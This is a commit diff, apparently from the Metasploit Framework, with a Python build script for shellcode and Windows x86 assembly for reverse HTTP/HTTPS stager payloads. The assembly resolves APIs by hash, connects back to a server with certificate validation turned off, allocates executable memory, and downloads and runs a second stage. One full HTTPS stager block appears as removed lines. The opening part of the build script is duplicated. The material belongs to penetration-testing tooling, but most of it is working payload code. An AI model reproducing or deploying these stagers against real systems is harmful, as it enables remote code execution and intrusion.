print "Usage: build.py [clean|all|<name>]"
else:
print "# Built on %s\n" % ( time.asctime( time.localtime() ) )
if argv[1] == "clean":
clean()
elif argv[1] == "all":
for root, dirs, files in os.walk( "./src/egghunter/" ):
for name in files:
build( name[:-4] )
for root, dirs, files in os.walk( "./src/migrate/" ):
for name in files:
build( name[:-4] )
for root, dirs, files in os.walk( "./src/single/" ):
for name in files:
build( name[:-4] )
for root, dirs, files in os.walk( "./src/stage/" ):
for name in files:
build( name[:-4] )
for root, dirs, files in os.walk( "./src/stager/" ):
for name in files:
build( name[:-4] )
for root, dirs, files in os.walk( "./src/kernel/" ):
for name in files:
build( name[:-4] )
else:
build( argv[1] )
except Exception, e:
print "[-] ", e
#=============================================================================#
if __name__ == "__main__":
main()
# A simple python build script to build the singles/stages/stagers and
# some usefull information such as offsets and a hex dump. The binary output
# will be placed in the bin directory. A hex string and usefull comments will
# be printed to screen.
#
# Example:
# >python build.py stager_reverse_tcp_nx
#
# Example, to build everything:
# >python build.py all > build_output.txt
#
# Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com)
#=============================================================================#
import os, sys, time
from subprocess import Popen
from struct import pack
#=============================================================================#
def clean( dir="./bin/" ):
for root, dirs, files in os.walk( dir ):
for name in files:
os.remove( os.path.join( root, name ) )
#=============================================================================#
def locate( src_file, dir="./src/" ):
for root, dirs, files in os.walk( dir ):
for name in files:
if src_file == name:
return root
return None
#=============================================================================#
def build( name ):
location = locate( "%s.asm" % name )
if location:
input = os.path.normpath( os.path.join( location, name ) )
output = os.path.normpath( os.path.join( "./bin/", name ) )
p = Popen( ["nasm", "-f bin", "-O3", "-o %s.bin" % output, "%s.asm" % input ] )
p.wait()
xmit( name )
else:
print "[-] Unable to locate '%s.asm' in the src directory" % name
#=============================================================================#
def xmit_dump_ruby( data, length=16 ):
dump = ""
for i in xrange( 0, len( data ), length ):
bytes = data[ i : i+length ]
hex = "\"%s\"" % ( ''.join( [ "\\x%02X" % ord(x) for x in bytes ] ) )
if i+length <= len(data):
hex += " +"
dump += "%s\n" % ( hex )
print dump
#=============================================================================#
def xmit_offset( data, name, value, match_offset=0 ):
offset = data.find( value );
if offset != -1:
print "# %s Offset: %d" % ( name, offset + match_offset )
#=============================================================================#
def xmit( name, dump_ruby=True ):
bin = os.path.normpath( os.path.join( "./bin/", "%s.bin" % name ) )
f = open( bin, 'rb')
data = f.read()
print "# Name: %s\n# Length: %d bytes" % ( name, len( data ) )
xmit_offset( data, "Port", pack( ">H", 4444 ) ) # 4444
xmit_offset( data, "LEPort", pack( "<H", 4444 ) ) # 4444
xmit_offset( data, "Host", pack( ">L", 0x7F000001 ) ) # 127.0.0.1
xmit_offset( data, "IPv6Host", pack( "<Q", 0xBBBBBBBBBBBBBBB1 ) ) # An IPv6 Address
xmit_offset( data, "IPv6ScopeId", pack( "<L", 0xAAAAAAA1 ) ) # An IPv6 Scope ID
xmit_offset( data, "HostName", "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX\x00" ) # hostname filler
xmit_offset( data, "RetryCounter", "\x6a\x05", 1 ) # socket retry
xmit_offset( data, "CodeLen", pack( "<L", 0x12345678 ) ) # Filler
xmit_offset( data, "Hostname", "https" )
xmit_offset( data, "ExitFunk", pack( "<L", 0x0A2A1DE0 ) ) # kernel32.dll!ExitThread
xmit_offset( data, "ExitFunk", pack( "<L", 0x56A2B5F0 ) ) # kernel32.dll!ExitProcess
xmit_offset( data, "ExitFunk", pack( "<L", 0xEA320EFE ) ) # kernel32.dll!SetUnhandledExceptionFilter
xmit_offset( data, "ExitFunk", pack( "<L", 0xE035F044 ) ) # kernel32.dll!Sleep
xmit_offset( data, "EggTag1", pack( "<L", 0xDEADDEAD ) ) # Egg tag 1
xmit_offset( data, "EggTag2", pack( "<L", 0xC0DEC0DE ) ) # Egg tag 2
xmit_offset( data, "EggTagSize", pack( ">H", 0x1122 ) ) # Egg tag size
xmit_offset( data, "RC4Key", "RC4KeyMetasploit") # RC4 key
xmit_offset( data, "XORKey", "XORK") # XOR key
if( name.find( "egghunter" ) >= 0 ):
null_count = data.count( "\x00" )
if( null_count > 0 ):
print "# Note: %d NULL bytes found." % ( null_count )
if dump_ruby:
xmit_dump_ruby( data )
#=============================================================================#
def main( argv=None ):
if not argv:
argv = sys.argv
try:
if len( argv ) == 1:
print "Usage: build.py [clean|all|<name>]"
else:
print "# Built on %s\n" % ( time.asctime( time.localtime() ) )
if argv[1] == "clean":
clean()
elif argv[1] == "all":
for root, dirs, files in os.walk( "./src/egghunter/" ):
for name in files:
build( name[:-4] )
for root, dirs, files in os.walk( "./src/migrate/" ):
for name in files:
build( name[:-4] )
for root, dirs, files in os.walk( "./src/single/" ):
for name in files:
build( name[:-4] )
for root, dirs, files in os.walk( "./src/stage/" ):
for name in files:
build( name[:-4] )
for root, dirs, files in os.walk( "./src/stager/" ):
for name in files:
build( name[:-4] )
for root, dirs, files in os.walk( "./src/kernel/" ):
for name in files:
build( name[:-4] )
else:
build( argv[1] )
except Exception, e:
print "[-] ", e
#=============================================================================#
if __name__ == "__main__":
main()
#=============================================================================#
external/source/shellcode/windows/x86/src/block/block_api.asm
Vendored
+20 -15
View File
@@ -23,7 +23,7 @@ api_call:
mov edx, [edx+20] ; Get the first module from the InMemoryOrder module list
next_mod: ;
mov esi, [edx+40] ; Get pointer to modules name (unicode string)
movzx ecx, word [edx+38] ; Set ECX to the length we want to check
movzx ecx, word [edx+38] ; Set ECX to the length we want to check
xor edi, edi ; Clear EDI which will store the hash of the module name
loop_modname: ;
xor eax, eax ; Clear EAX
@@ -34,22 +34,25 @@ loop_modname: ;
not_lowercase: ;
ror edi, 13 ; Rotate right our hash value
add edi, eax ; Add the next byte of the name
loop loop_modname ; Loop untill we have read enough
loop loop_modname ; Loop until we have read enough
; We now have the module hash computed
push edx ; Save the current position in the module list for later
push edi ; Save the current module hash for later
; Proceed to itterate the export address table,
; Proceed to iterate the export address table,
mov edx, [edx+16] ; Get this modules base address
mov eax, [edx+60] ; Get PE header
add eax, edx ; Add the modules base address
mov eax, [eax+120] ; Get export tables RVA
test eax, eax ; Test if no export address table is present
jz get_next_mod1 ; If no EAT present, process the next module
add eax, edx ; Add the modules base address
push eax ; Save the current modules EAT
mov ecx, [eax+24] ; Get the number of function names
mov ebx, [eax+32] ; Get the rva of the function names
; use ecx as our EAT pointer here so we can take advantage of jecxz.
mov ecx, [eax+edx+120] ; Get the EAT from the PE header
jecxz get_next_mod1 ; If no EAT present, process the next module
add ecx, edx ; Add the modules base address
push ecx ; Save the current modules EAT
mov ebx, [ecx+32] ; Get the rva of the function names
add ebx, edx ; Add the modules base address
mov ecx, [ecx+24] ; Get the number of function names
; now ecx returns to its regularly scheduled counter duties
; Computing the module hash + function hash
get_next_func: ;
jecxz get_next_mod ; When we reach the start of the EAT (we search backwards), process the next module
@@ -66,14 +69,15 @@ loop_funcname: ;
cmp al, ah ; Compare AL (the next byte from the name) to AH (null)
jne loop_funcname ; If we have not reached the null terminator, continue
add edi, [ebp-8] ; Add the current module hash to the function hash
cmp edi, [ebp+36] ; Compare the hash to the one we are searchnig for
cmp edi, [ebp+36] ; Compare the hash to the one we are searching for
jnz get_next_func ; Go compute the next function hash if we have not found it
; If found, fix up stack, call the function and then value else compute the next one...
pop eax ; Restore the current modules EAT
mov ebx, [eax+36] ; Get the ordinal table rva
mov ebx, [eax+36] ; Get the ordinal table rva
add ebx, edx ; Add the modules base address
mov cx, [ebx+2*ecx] ; Get the desired functions ordinal
mov ebx, [eax+28] ; Get the function addresses table rva
mov ebx, [eax+28] ; Get the function addresses table rva
add ebx, edx ; Add the modules base address
mov eax, [ebx+4*ecx] ; Get the desired functions RVA
add eax, edx ; Add the modules base address to get the functions actual VA
@@ -88,10 +92,11 @@ finish:
push ecx ; Push back the correct return value
jmp eax ; Jump into the required function
; We now automagically return to the correct caller...
get_next_mod: ;
pop eax ; Pop off the current (now the previous) modules EAT
get_next_mod1: ;
pop edi ; Pop off the current (now the previous) modules hash
pop edx ; Restore our position in the module list
mov edx, [edx] ; Get the next module
jmp short next_mod ; Process this module
jmp short next_mod ; Process this module
external/source/shellcode/windows/x86/src/block/block_reverse_http.asm
Vendored
+82 -52
View File
@@ -6,6 +6,25 @@
;-----------------------------------------------------------------------------;
[BITS 32]
%ifdef ENABLE_SSL
%define HTTP_OPEN_FLAGS ( 0x80000000 | 0x04000000 | 0x00400000 | 0x00200000 | 0x00000200 | 0x00800000 | 0x00002000 | 0x00001000 )
;0x80000000 | ; INTERNET_FLAG_RELOAD
;0x04000000 | ; INTERNET_NO_CACHE_WRITE
;0x00400000 | ; INTERNET_FLAG_KEEP_CONNECTION
;0x00200000 | ; INTERNET_FLAG_NO_AUTO_REDIRECT
;0x00000200 | ; INTERNET_FLAG_NO_UI
;0x00800000 | ; INTERNET_FLAG_SECURE
;0x00002000 | ; INTERNET_FLAG_IGNORE_CERT_DATE_INVALID
;0x00001000 ; INTERNET_FLAG_IGNORE_CERT_CN_INVALID
%else
%define HTTP_OPEN_FLAGS ( 0x80000000 | 0x04000000 | 0x00400000 | 0x00200000 | 0x00000200 )
;0x80000000 | ; INTERNET_FLAG_RELOAD
;0x04000000 | ; INTERNET_NO_CACHE_WRITE
;0x00400000 | ; INTERNET_FLAG_KEEP_CONNECTION
;0x00200000 | ; INTERNET_FLAG_NO_AUTO_REDIRECT
;0x00000200 ; INTERNET_FLAG_NO_UI
%endif
; Input: EBP must be the address of 'api_call'.
; Output: EDI will be the socket for the connection to the server
; Clobbers: EAX, ESI, EDI, ESP will also be modified (-0x1A0)
@@ -16,65 +35,74 @@ load_wininet:
push 0x0726774C ; hash( "kernel32.dll", "LoadLibraryA" )
call ebp ; LoadLibraryA( "wininet" )
xor ebx,ebx
internetopen:
xor edi,edi
push edi ; DWORD dwFlags
push edi ; LPCTSTR lpszProxyBypass
push edi ; LPCTSTR lpszProxyName
push edi ; DWORD dwAccessType (PRECONFIG = 0)
push byte 0 ; NULL pointer
push esp ; LPCTSTR lpszAgent ("\x00")
push ebx ; DWORD dwFlags
push ebx ; LPCTSTR lpszProxyBypass (NULL)
push ebx ; LPCTSTR lpszProxyName (NULL)
push ebx ; DWORD dwAccessType (PRECONFIG = 0)
push ebx ; LPCTSTR lpszAgent (NULL)
push 0xA779563A ; hash( "wininet.dll", "InternetOpenA" )
call ebp
jmp short dbl_get_server_host
internetconnect:
pop ebx ; Save the hostname pointer
xor ecx, ecx
push ecx ; DWORD_PTR dwContext (NULL)
push ecx ; dwFlags
push ebx ; DWORD_PTR dwContext (NULL)
push ebx ; dwFlags
push byte 3 ; DWORD dwService (INTERNET_SERVICE_HTTP)
push ecx ; password
push ecx ; username
push ebx ; password (NULL)
push ebx ; username (NULL)
push dword 4444 ; PORT
push ebx ; HOSTNAME
jmp short dbl_get_server_host ; push pointer to HOSTNAME
got_server_host:
push eax ; HINTERNET hInternet
push 0xC69F8957 ; hash( "wininet.dll", "InternetConnectA" )
call ebp
jmp get_server_uri
httpopenrequest:
pop ecx
xor edx, edx ; NULL
push edx ; dwContext (NULL)
push (0x80000000 | 0x04000000 | 0x00200000 | 0x00000200 | 0x00400000) ; dwFlags
;0x80000000 | ; INTERNET_FLAG_RELOAD
;0x04000000 | ; INTERNET_NO_CACHE_WRITE
;0x00200000 | ; INTERNET_FLAG_NO_AUTO_REDIRECT
;0x00000200 | ; INTERNET_FLAG_NO_UI
;0x00400000 ; INTERNET_FLAG_KEEP_CONNECTION
push edx ; accept types
push edx ; referrer
push edx ; version
push ecx ; url
push edx ; method
push ebx ; dwContext (NULL)
push HTTP_OPEN_FLAGS ; dwFlags
push ebx ; accept types
push ebx ; referrer
push ebx ; version
jmp get_server_uri ; push pointer to url
got_server_uri:
push ebx ; method
push eax ; hConnection
push 0x3B2E55EB ; hash( "wininet.dll", "HttpOpenRequestA" )
call ebp
mov esi, eax ; hHttpRequest
xchg esi, eax ; save hHttpRequest in esi
set_retry:
push byte 0x10
pop ebx
pop edi
send_request:
%ifdef ENABLE_SSL
; InternetSetOption (hReq, INTERNET_OPTION_SECURITY_FLAGS, &dwFlags, sizeof (dwFlags) );
set_security_options:
push 0x00003380
;0x00002000 | ; SECURITY_FLAG_IGNORE_CERT_DATE_INVALID
;0x00001000 | ; SECURITY_FLAG_IGNORE_CERT_CN_INVALID
;0x00000200 | ; SECURITY_FLAG_IGNORE_WRONG_USAGE
;0x00000100 | ; SECURITY_FLAG_IGNORE_UNKNOWN_CA
;0x00000080 ; SECURITY_FLAG_IGNORE_REVOCATION
mov eax, esp
push byte 4 ; sizeof(dwFlags)
push eax ; &dwFlags
push byte 31 ; DWORD dwOption (INTERNET_OPTION_SECURITY_FLAGS)
push esi ; hHttpRequest
push 0x869E4675 ; hash( "wininet.dll", "InternetSetOptionA" )
call ebp
%endif
httpsendrequest:
xor edi, edi
push edi ; optional length
push edi ; optional
push edi ; dwHeadersLength
push edi ; headers
push ebx ; lpOptional length (0)
push ebx ; lpOptional (NULL)
push ebx ; dwHeadersLength (0)
push ebx ; lpszHeaders (NULL)
push esi ; hHttpRequest
push 0x7B18062D ; hash( "wininet.dll", "HttpSendRequestA" )
call ebp
@@ -82,28 +110,30 @@ httpsendrequest:
jnz short allocate_memory
try_it_again:
dec ebx
jz failure
jmp short httpsendrequest
dec edi
jnz send_request
dbl_get_server_host:
jmp get_server_host
get_server_uri:
call httpopenrequest
server_uri:
db "/12345", 0x00
; if we didn't allocate before running out of retries, fall through to
; failure
failure:
push 0x56A2B5F0 ; hardcoded to exitprocess for size
call ebp
dbl_get_server_host:
jmp get_server_host
get_server_uri:
call got_server_uri
server_uri:
db "/12345", 0x00
allocate_memory:
push byte 0x40 ; PAGE_EXECUTE_READWRITE
push 0x1000 ; MEM_COMMIT
push 0x00400000 ; Stage allocation (8Mb ought to do us)
push edi ; NULL as we dont care where the allocation is (zero'd from the prev function)
push ebx ; NULL as we dont care where the allocation is
push 0xE553A458 ; hash( "kernel32.dll", "VirtualAlloc" )
call ebp ; VirtualAlloc( NULL, dwLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE );
@@ -135,7 +165,7 @@ execute_stage:
ret ; dive into the stored stage address
get_server_host:
call internetconnect
call got_server_host
server_host:
external/source/shellcode/windows/x86/src/block/block_reverse_https.asm
Vendored
-159
View File
@@ -1,159 +0,0 @@
;-----------------------------------------------------------------------------;
; Author: HD Moore
; Compatible: Confirmed Windows 7, Windows 2008 Server, Windows XP SP1, Windows SP3, Windows 2000
; Known Bugs: Incompatible with Windows NT 4.0, buggy on Windows XP Embedded (SP1)
; Version: 1.0
;-----------------------------------------------------------------------------;
[BITS 32]
; Input: EBP must be the address of 'api_call'.
; Output: EDI will be the socket for the connection to the server
; Clobbers: EAX, ESI, EDI, ESP will also be modified (-0x1A0)
load_wininet:
push 0x0074656e ; Push the bytes 'wininet',0 onto the stack.
push 0x696e6977 ; ...
push esp ; Push a pointer to the "wininet" string on the stack.
push 0x0726774C ; hash( "kernel32.dll", "LoadLibraryA" )
call ebp ; LoadLibraryA( "wininet" )
internetopen:
xor edi,edi
push edi ; DWORD dwFlags
push edi ; LPCTSTR lpszProxyBypass
push edi ; LPCTSTR lpszProxyName
push edi ; DWORD dwAccessType (PRECONFIG = 0)
push byte 0 ; NULL pointer
push esp ; LPCTSTR lpszAgent ("\x00")
push 0xA779563A ; hash( "wininet.dll", "InternetOpenA" )
call ebp
jmp short dbl_get_server_host
internetconnect:
pop ebx ; Save the hostname pointer
xor ecx, ecx
push ecx ; DWORD_PTR dwContext (NULL)
push ecx ; dwFlags
push byte 3 ; DWORD dwService (INTERNET_SERVICE_HTTP)
push ecx ; password
push ecx ; username
push dword 4444 ; PORT
push ebx ; HOSTNAME
push eax ; HINTERNET hInternet
push 0xC69F8957 ; hash( "wininet.dll", "InternetConnectA" )
call ebp
jmp get_server_uri
httpopenrequest:
pop ecx
xor edx, edx ; NULL
push edx ; dwContext (NULL)
push (0x80000000 | 0x04000000 | 0x00800000 | 0x00200000 |0x00001000 |0x00002000 |0x00000200) ; dwFlags
;0x80000000 | ; INTERNET_FLAG_RELOAD
;0x04000000 | ; INTERNET_NO_CACHE_WRITE
;0x00800000 | ; INTERNET_FLAG_SECURE
;0x00200000 | ; INTERNET_FLAG_NO_AUTO_REDIRECT
;0x00001000 | ; INTERNET_FLAG_IGNORE_CERT_CN_INVALID
;0x00002000 | ; INTERNET_FLAG_IGNORE_CERT_DATE_INVALID
;0x00000200 ; INTERNET_FLAG_NO_UI
push edx ; accept types
push edx ; referrer
push edx ; version
push ecx ; url
push edx ; method
push eax ; hConnection
push 0x3B2E55EB ; hash( "wininet.dll", "HttpOpenRequestA" )
call ebp
mov esi, eax ; hHttpRequest
set_retry:
push byte 0x10
pop ebx
; InternetSetOption (hReq, INTERNET_OPTION_SECURITY_FLAGS, &dwFlags, sizeof (dwFlags) );
set_security_options:
push 0x00003380
;0x00002000 | ; SECURITY_FLAG_IGNORE_CERT_DATE_INVALID
;0x00001000 | ; SECURITY_FLAG_IGNORE_CERT_CN_INVALID
;0x00000200 | ; SECURITY_FLAG_IGNORE_WRONG_USAGE
;0x00000100 | ; SECURITY_FLAG_IGNORE_UNKNOWN_CA
;0x00000080 ; SECURITY_FLAG_IGNORE_REVOCATION
mov eax, esp
push byte 4 ; sizeof(dwFlags)
push eax ; &dwFlags
push byte 31 ; DWORD dwOption (INTERNET_OPTION_SECURITY_FLAGS)
push esi ; hRequest
push 0x869E4675 ; hash( "wininet.dll", "InternetSetOptionA" )
call ebp
httpsendrequest:
xor edi, edi
push edi ; optional length
push edi ; optional
push edi ; dwHeadersLength
push edi ; headers
push esi ; hHttpRequest
push 0x7B18062D ; hash( "wininet.dll", "HttpSendRequestA" )
call ebp
test eax,eax
jnz short allocate_memory
try_it_again:
dec ebx
jz failure
jmp short set_security_options
dbl_get_server_host:
jmp get_server_host
get_server_uri:
call httpopenrequest
server_uri:
db "/12345", 0x00
failure:
push 0x56A2B5F0 ; hardcoded to exitprocess for size
call ebp
allocate_memory:
push byte 0x40 ; PAGE_EXECUTE_READWRITE
push 0x1000 ; MEM_COMMIT
push 0x00400000 ; Stage allocation (8Mb ought to do us)
push edi ; NULL as we dont care where the allocation is (zero'd from the prev function)
push 0xE553A458 ; hash( "kernel32.dll", "VirtualAlloc" )
call ebp ; VirtualAlloc( NULL, dwLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE );
download_prep:
xchg eax, ebx ; place the allocated base address in ebx
push ebx ; store a copy of the stage base address on the stack
push ebx ; temporary storage for bytes read count
mov edi, esp ; &bytesRead
download_more:
push edi ; &bytesRead
push 8192 ; read length
push ebx ; buffer
push esi ; hRequest
push 0xE2899612 ; hash( "wininet.dll", "InternetReadFile" )
call ebp
test eax,eax ; download failed? (optional?)
jz failure
mov eax, [edi]
add ebx, eax ; buffer += bytes_received
test eax,eax ; optional?
jnz download_more ; continue until it returns 0
pop eax ; clear the temporary storage
execute_stage:
ret ; dive into the stored stage address
get_server_host:
call internetconnect
server_host:
external/source/shellcode/windows/x86/src/stager/stager_reverse_https.asm
Vendored
+18 -17
View File
@@ -1,19 +1,20 @@
;-----------------------------------------------------------------------------;
; Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com)
; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
; Version: 1.0 (24 July 2009)
; Size: 274 bytes
; Build: >build.py stager_reverse_tcp_nx
;-----------------------------------------------------------------------------;
[BITS 32]
[ORG 0]
cld ; Clear the direction flag.
call start ; Call start, this pushes the address of 'api_call' onto the stack.
%include "./src/block/block_api.asm"
start: ;
pop ebp ; pop off the address of 'api_call' for calling later.
%include "./src/block/block_reverse_https.asm"
;-----------------------------------------------------------------------------;
; Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com)
; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
; Version: 1.0 (24 July 2009)
; Size: 274 bytes
; Build: >build.py stager_reverse_tcp_nx
;-----------------------------------------------------------------------------;
[BITS 32]
[ORG 0]
cld ; Clear the direction flag.
call start ; Call start, this pushes the address of 'api_call' onto the stack.
%include "./src/block/block_api.asm"
start: ;
pop ebp ; pop off the address of 'api_call' for calling later.
%define ENABLE_SSL 1
%include "./src/block/block_reverse_http.asm"
; By here we will have performed the reverse_tcp connection and EDI will be our socket.
external/source/vncdll/vncdll/LICENSE.txt
Vendored
+3 -3
View File
@@ -1,4 +1,4 @@
Copyright (C) 2006-2010, Rapid7 LLC
Copyright (C) 2006-2010, Rapid7, Inc
All rights reserved.
Redistribution and use in source and binary forms, with or without modification,
@@ -11,7 +11,7 @@ are permitted provided that the following conditions are met:
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
* Neither the name of Rapid7 LLC nor the names of its contributors
* Neither the name of Rapid7, Inc nor the names of its contributors
may be used to endorse or promote products derived from this software
without specific prior written permission.
@@ -24,4 +24,4 @@ ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
external/source/vncdll/vncdll/context.h
Vendored
+3 -3
View File
@@ -1,4 +1,4 @@
// Copyright (C) 2006-2010, Rapid7 LLC
// Copyright (C) 2006-2010, Rapid7, Inc
// All rights reserved.
//
// Redistribution and use in source and binary forms, with or without modification,
@@ -11,7 +11,7 @@
// this list of conditions and the following disclaimer in the documentation
// and/or other materials provided with the distribution.
//
// * Neither the name of Rapid7 LLC nor the names of its contributors
// * Neither the name of Rapid7, Inc nor the names of its contributors
// may be used to endorse or promote products derived from this software
// without specific prior written permission.
//
@@ -105,4 +105,4 @@ DWORD WINAPI context_message_thread( LPVOID lpParameter );
//===============================================================================================//
#endif
//===============================================================================================//
//===============================================================================================//
external/source/vncdll/vncdll/inject.h
Vendored
+3 -3
View File
@@ -1,4 +1,4 @@
// Copyright (C) 2006-2010, Rapid7 LLC
// Copyright (C) 2006-2010, Rapid7, Inc
// All rights reserved.
//
// Redistribution and use in source and binary forms, with or without modification,
@@ -11,7 +11,7 @@
// this list of conditions and the following disclaimer in the documentation
// and/or other materials provided with the distribution.
//
// * Neither the name of Rapid7 LLC nor the names of its contributors
// * Neither the name of Rapid7, Inc nor the names of its contributors
// may be used to endorse or promote products derived from this software
// without specific prior written permission.
//
@@ -99,4 +99,4 @@ DWORD inject_dll( DWORD dwPid, LPVOID lpDllBuffer, DWORD dwDllLenght );
//===============================================================================================//
#endif
//===============================================================================================//
//===============================================================================================//

Some files were not shown because too many files have changed in this diff Show More